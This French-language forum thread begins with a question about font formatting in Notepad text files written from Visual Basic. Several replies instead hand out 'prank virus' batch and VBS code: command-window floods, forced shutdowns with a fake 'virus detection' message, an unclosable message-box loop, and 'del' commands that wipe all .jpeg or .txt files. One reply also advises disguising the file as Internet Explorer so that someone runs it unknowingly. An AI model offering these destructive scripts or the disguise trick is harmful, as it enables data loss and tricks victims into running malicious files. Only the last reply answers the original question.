Se connecter / S'enregistrer
Votre question

code de fonction dans le bloc note notepad.exe

Tags :
  • Programme
  • Logiciels
Dernière réponse : dans Logiciels
20 Janvier 2006 20:05:27

Je programme en visual basic...
J'écris dans un fichier texte, lisible en ouvrant le bloc note "notepad.exe".
Je voudrais connaître les codes de fonctions à associer au texte, qui me permettent de changer la police, son style etc...
Merci

Autres pages sur : code fonction bloc note notepad exe

23 Décembre 2010 14:06:17

Eh bien je ne sais pas si je t'avance mais tu peux programmer nimporteqoi et si tu cherche des codes je peux t'en donner:
Marque ceci:
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start error cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start error cmd.exe

voila c très facile: Le start cmd.exe est une fenêtre et le start error cmd.exe fait une erreur donc c une sorte de petit virus complètement innofensif qui t'ouvre des fenêtres. Le nombre de start cmd.exe peut don changer mais il ne faut q'un seul start error cmd.exe après une série de start cmd.exe
Voila j'éspere que je t'ai un peu aidé et si tu veux d'autres codes demande et je t'en dirai plus.
;) 
17 Mars 2011 19:01:10

le plus simple c de taper "start CB" de l'enregistre en .bat et ca t ouvre 400 pages ou plus en deux mot !!!! ;)  :)  ;) 
Contenus similaires
17 Mars 2011 19:18:41

d'autres codes:

-pour eteindre l'ordinateur sans aucun risque : ( shutdown -s -t 30 -c " virus detection )enregistrez en .bat ; vous pouver remplacer le 30 par un autre nombre : il indique le temps que mettra l'ordinateur a s'eteindre
virus detection peut etre aussi remplacer par nimporte quel message: il s'affiche avant l'extinction.

-pour le redemarer: ( shutdown -r -t 30 -c " virus detection ) enregistrez en .bat

-ce troisieme est plus complexe, il permet d'afficher un texte qui ne peux pas s'effacer : une fenetre s'ouvre avec votre texte inscrit et un bouton "OK" lorsque vous appuyer sur ce dernier vous avez la possibiliter d afficher un segond texte:
(do
msgbox " votre texte "
msgbox "votre deuxieme texte, vous pouver en rajouter autant que vous voulez"
loop)
enregistrez le tout en .vbs
le seul moyen de se debarasser des messages est de fermer la cession ou d'eteindre l ordinateur.

-enfin il vous est possible de suprimer tous les dossier d un meme type:
(del c:*.jpeg) pour suprimer toutes les images
(del c:*.txt) pour suprimer tous les textes
vous pouvez remplacer l' "*" par le nom du fichier a suprimer afin d'en suprimer un seul.
ces dernier seront enregistrez en .bat

PS: tous ces codes sont effectuez sur le bloc note

NB: la meilleure astuce est de placer le fichier sur le bureau et de remplacer l'icone et le nom de l'icone par celui d' "Internet Explorer"
2 Juillet 2014 05:55:29

ou es le code
a b 6 Logiciels
2 Juillet 2014 08:55:00

un fichier texte(bloc note) ne gere pas les mises en page, pour appliquer une mise en page il vaut mieux passer sur un format richtext. (wordpad)
Tom's guide dans le monde
  • Allemagne
  • Italie
  • Irlande
  • Royaume Uni
  • Etats Unis
Suivre Tom's Guide
Inscrivez-vous à la Newsletter
  • ajouter à twitter
  • ajouter à facebook
  • ajouter un flux RSS